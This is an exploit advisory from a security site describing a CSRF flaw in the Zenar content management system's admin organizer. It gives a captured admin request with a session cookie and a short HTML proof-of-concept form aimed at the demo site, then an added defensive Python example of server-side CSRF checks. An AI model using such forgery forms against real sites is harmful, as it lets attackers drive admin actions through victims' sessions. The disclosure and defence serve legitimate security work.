Zenar Content Management System - Cross-Site Request Forgery ( CSRF )

2018.05.23
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Zenar Content Management System - Cross-Site Request Forgery ( CSRF )
# Software Link: https://zenar.io/
# Dork: N/A
# Author: Ismail Tasdelen
# Tested Website: http://demo.zenar.io
# Date: 2018-05-21
# Category: Web Application

# POC :

# GET Request :

Request URL: http://demo.zenar.io/zenario/admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent&skinId=&refinerId=html&refinerName=content_type&refiner__content_type=html&_limit=50&_start=0&_item=html_10&_sort_col=first_created_datetime&_sort_desc=0
Request Method: GET
Status Code: 200 OK
Remote Address: 213.146.173.88:80
Referrer Policy: no-referrer-when-downgrade
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
Cookie: PHPSESSID=1jltufrek0ugagehl7fjieeud6; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1
Host: demo.zenar.io
Referer: http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36
X-Requested-With: XMLHttpRequest

# Query String Parameters :

path: zenario__content/panels/content
skinId:
refinerId: html
refinerName: content_type
refiner__content_type: html
_limit: 50
_start: 0
_item: html_10
_sort_col: first_created_datetime
_sort_desc: 0

# CSRF HTML :

<html><head>
<title> Zenar Content Management System - Cross-Site Request Forgery ( CSRF ) </title>
</head><body>
<form action="http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html#zenario__content/panels/content/refiners/content_type//html//html_" method="GET">
<input type="text" name="html_" value="10" /><br />
<input type='submit' value='Go!' />
</form>
</body></html>

# You want to follow my activity?
https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln
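Added example, not part of the advisory and not Zenario's own code: a minimal server-side CSRF gate in Python showing the checks that stop a cross-site form like the one above from driving an admin action on a cookie-authenticated session. The host name, the _csrf parameter name, the session id and the server secret are assumptions for the illustration.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Assumption: the admin site's own host, used to judge Origin/Referer.
SITE_HOST = "demo.zenar.io"


def issue_token(session_id: str, secret: bytes) -> str:
    """Derive a per-session anti-CSRF token (HMAC of the session id).

    The server embeds this in its own pages; a third-party page cannot read it.
    """
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def same_site_source(headers: dict) -> bool:
    """True only if Origin (or, failing that, Referer) names our own host.

    With neither header present we fail closed rather than guess.
    """
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    return urlsplit(src).hostname == SITE_HOST


def csrf_gate(method: str, headers: dict, params: dict,
              session_id: str, secret: bytes) -> tuple:
    """Decide whether a state-changing admin request may proceed.

    Returns (allowed, reason). Each check alone would block the advisory's
    GET form; together they also cover scripted cross-site POSTs.
    """
    # 1. State changes must not ride on GET: browsers issue GETs freely
    #    from links, images and forms on any site, cookies attached.
    if method.upper() == "GET":
        return False, "state change over GET"
    # 2. The browser-set source headers must point at our own site.
    if not same_site_source(headers):
        return False, "cross-site Origin/Referer"
    # 3. A plain HTML form cannot add custom headers; requiring one
    #    restricts the endpoint to same-origin XMLHttpRequest/fetch calls.
    if headers.get("X-Requested-With") != "XMLHttpRequest":
        return False, "missing custom header"
    # 4. The per-session token (assumed parameter name "_csrf") must match,
    #    compared in constant time.
    expected = issue_token(session_id, secret)
    if not hmac.compare_digest(params.get("_csrf", ""), expected):
        return False, "bad or missing token"
    return True, "ok"
```

The first check is the one that matters most for the advisory: an admin action reachable through a GET form needs no token leak at all to be triggered from another site.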


Copyright 2018, cxsecurity.com
